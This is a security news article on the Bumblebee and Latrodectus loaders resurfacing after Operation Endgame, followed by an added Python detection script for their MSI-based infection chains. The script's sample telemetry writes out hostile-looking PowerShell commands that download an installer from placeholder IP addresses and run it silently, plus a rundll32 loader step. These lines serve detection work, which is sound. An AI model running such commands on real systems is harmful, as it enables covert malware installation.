Two malware loaders disrupted by the coordinated law enforcement action known as Operation Endgame, Bumblebee and Latrodectus, have resurfaced in new phishing campaigns.
Both are loaders built to steal data and to drop additional payloads on compromised hosts.
Latrodectus, also tracked under the aliases BlackWidow, IceNova, and Lotus, is linked to the IcedID lineage and has been distributed by the initial access brokers TA577 (also known as Water Curupira) and TA578.
In May 2024, European authorities dismantled more than 100 servers supporting IcedID and other loaders, including Bumblebee, SmokeLoader, and TrickBot.
In June 2024, Bitsight’s João Batista highlighted that Latrodectus also suffered an outage during the enforcement operation.
Trustwave, in a recent analysis, noted Latrodectus’s emergence as a significant threat post-Endgame.
Trustwave mentioned, “Latrodectus swiftly recovered from initial disruptions. Its sophisticated features filled the gap created by incapacitated counterparts, establishing it as a formidable menace.”
The campaigns commonly rely on hijacked email threads and on lures impersonating legitimate services such as Microsoft Azure and Google Cloud.
Forcepoint and Logpoint have recently observed a similar infection chain that uses DocuSign-themed emails carrying either malicious links or HTML documents with embedded JavaScript that downloads an MSI installer and a PowerShell script.
Whichever lure is used, the chain ends by launching Latrodectus through a malicious DLL.
Forcepoint’s Mayur Sewani remarked, “Latrodectus exploits older infrastructure with innovative malware delivery methods to target financial, automotive, and business sectors.”
Bumblebee’s return overlaps with the Latrodectus activity; its campaign delivers a ZIP archive through deceptive emails.
“Through a ZIP file containing ‘Report-41952.lnk,’ Bumblebee installs its malicious payload in memory, sidestepping the need for disk writing,” recounted Netskope’s Leandro Fróes.
Opening ‘Report-41952.lnk’ runs a PowerShell command that downloads an MSI installer from a remote server; the installer, disguised as a legitimate NVIDIA or Midjourney installer, launches Bumblebee.
“Bumblebee follows a discreet approach, ensuring no additional processes are spawned and evading disk writes for the final payload,” Fróes detailed.
“By employing the SelfReg table, it activates the DllRegisterServer function within a file referenced in the File table, using the appointed SelfReg entry as a cue to identify the intended DLL file to execute.”
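As an added example (not code from the article or from Netskope, Forcepoint, or Logpoint), the Python sketch below turns both chains described above into detection and triage logic: a script host downloading an MSI, msiexec started quietly by that script host from a URL or user-writable path, the Latrodectus-style hand-off of a dropped DLL to rundll32, and the Bumblebee-style SelfReg case in which msiexec.exe itself loads an unsigned DLL and spawns nothing. It runs over constructed process-creation and image-load events in a Sysmon-like shape; the field names, pids, hosts, paths, and file names are assumptions, as is the parent/child shape of the rundll32 step. The static SelfReg check assumes the File and SelfReg tables have been exported with msiinfo from GNOME msitools.

```python
"""Triage helpers for the two loader chains described above: the Latrodectus chain
(HTML/JavaScript -> MSI + PowerShell -> DLL) and the Bumblebee chain (LNK -> PowerShell
-> MSI whose SelfReg table has msiexec call DllRegisterServer on a bundled DLL).
Added example: not code from the article, Netskope, Forcepoint, or Logpoint. All event
fields, pids, hosts, paths, and file names below are constructed assumptions."""
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
USER_WRITABLE = re.compile(r"(?i)\\(Users\\[^\\]+\\(AppData|Downloads)|ProgramData|Windows\\Temp)\\")
DOWNLOAD_HINTS = re.compile(r"(?i)(invoke-webrequest|\biwr\b|downloadfile|\bcurl\b|start-bitstransfer|net\.webclient)")
QUIET_INSTALL = re.compile(r"(?i)\s/q(uiet|n|b)?\b")
URL = re.compile(r"(?i)https?://\S+")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_process_event(ev: dict) -> list:
    """Findings for one process-creation event (Sysmon event ID 1 shape, assumed field names)."""
    findings = []
    image, parent, cmd = basename(ev["image"]), basename(ev["parent_image"]), ev["cmdline"]
    # Stage 1 of both chains: a script host fetches an installer from the network.
    if image in SCRIPT_HOSTS and DOWNLOAD_HINTS.search(cmd) and re.search(r"(?i)\.msi\b", cmd):
        findings.append("script host downloads MSI")
    # Stage 2: msiexec started by a script host, quietly, from a URL or a user-writable path.
    if (image == "msiexec.exe" and parent in SCRIPT_HOSTS and QUIET_INSTALL.search(cmd)
            and (URL.search(cmd) or USER_WRITABLE.search(cmd))):
        findings.append("quiet MSI install from script host")
    # Stage 3, Latrodectus-style: the installer hands a dropped DLL to rundll32 (assumed parent/child shape).
    if image == "rundll32.exe" and parent == "msiexec.exe" and USER_WRITABLE.search(cmd):
        findings.append("MSI-dropped DLL executed via rundll32")
    return findings


def score_image_load(ev: dict) -> list:
    """Findings for one image-load event (Sysmon event ID 7 shape). This is the Bumblebee
    SelfReg case: no child process appears, the payload DLL is loaded by msiexec.exe itself."""
    if basename(ev["image"]) == "msiexec.exe" and USER_WRITABLE.search(ev["loaded"]) and not ev.get("signed", False):
        return ["unsigned DLL from user-writable path loaded into msiexec.exe"]
    return []


def triage(process_events, image_load_events) -> dict:
    """Map pid -> findings; pids with no findings are omitted."""
    hits = {}
    for ev in process_events:
        if (f := score_process_event(ev)):
            hits.setdefault(ev["pid"], []).extend(f)
    for ev in image_load_events:
        if (f := score_image_load(ev)):
            hits.setdefault(ev["pid"], []).extend(f)
    return hits


def selfreg_targets(file_rows, selfreg_rows) -> list:
    """Static check on an MSI: which bundled files will msiexec load and call DllRegisterServer on?
    Rows are dicts in the shape of `msiinfo export pkg.msi File` / `... SelfReg` output (GNOME msitools);
    column names follow the Windows Installer schema (File.File, File.FileName, SelfReg.File_).
    FileName may use the "SHORT~1.DLL|long.dll" form, so the long name is kept."""
    by_key = {r["File"]: r["FileName"].split("|")[-1] for r in file_rows}
    return [by_key.get(r["File_"], r["File_"]) for r in selfreg_rows]


# Constructed telemetry. pids 4100/4188: Bumblebee-style LNK -> PowerShell -> quiet MSI;
# pids 5200/5210/5300: Latrodectus-style JS -> PowerShell -> MSI -> rundll32; pid 7000: benign install.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSIEXEC = r"C:\Windows\System32\msiexec.exe"
SAMPLE_PROCESS_EVENTS = [
    {"pid": 4100, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell.exe -w hidden -c "iwr http://203.0.113.10/setup.msi -OutFile $env:TEMP\setup.msi; msiexec /i $env:TEMP\setup.msi /qn"'},
    {"pid": 4188, "image": MSIEXEC, "parent_image": PS,
     "cmdline": r"msiexec /i C:\Users\alice\AppData\Local\Temp\setup.msi /qn"},
    {"pid": 5200, "image": PS, "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"powershell -ep bypass -c (New-Object Net.WebClient).DownloadFile('http://198.51.100.7/x.msi','C:\Users\alice\AppData\Roaming\x.msi')"},
    {"pid": 5210, "image": MSIEXEC, "parent_image": PS,
     "cmdline": r"msiexec /i C:\Users\alice\AppData\Roaming\x.msi /quiet"},
    {"pid": 5300, "image": r"C:\Windows\System32\rundll32.exe", "parent_image": MSIEXEC,
     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Roaming\Updater\loader.dll,entry"},
    {"pid": 7000, "image": MSIEXEC, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"msiexec /i C:\Users\alice\Downloads\7zip.msi"},
]
SAMPLE_IMAGE_LOAD_EVENTS = [
    {"pid": 4188, "image": MSIEXEC, "loaded": r"C:\Users\alice\AppData\Local\Temp\MSI9A7B.tmp\runtime.dll", "signed": False},
    {"pid": 7000, "image": MSIEXEC, "loaded": r"C:\Windows\System32\msi.dll", "signed": True},
]
# Constructed File and SelfReg tables, as msiinfo would export them for the Bumblebee-style MSI.
SAMPLE_FILE_TABLE = [{"File": "f_runtime", "FileName": "RUNTIM~1.DLL|runtime.dll"},
                     {"File": "f_readme", "FileName": "README.TXT|readme.txt"}]
SAMPLE_SELFREG_TABLE = [{"File_": "f_runtime", "Cost": "0"}]

if __name__ == "__main__":
    for pid, f in sorted(triage(SAMPLE_PROCESS_EVENTS, SAMPLE_IMAGE_LOAD_EVENTS).items()):
        print(pid, f)
    print("SelfReg targets:", selfreg_targets(SAMPLE_FILE_TABLE, SAMPLE_SELFREG_TABLE))
```

The benign install (pid 7000, msiexec launched from Explorer without a script host in the chain, loading only a signed system DLL) produces no finding, which is the point of tying each rule to the parent process and the load path rather than to msiexec alone. Pairing the process rules with the image-load rule matters for the Bumblebee case: because the SelfReg table makes msiexec call DllRegisterServer in-process, a detection that waits for a child process never fires.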



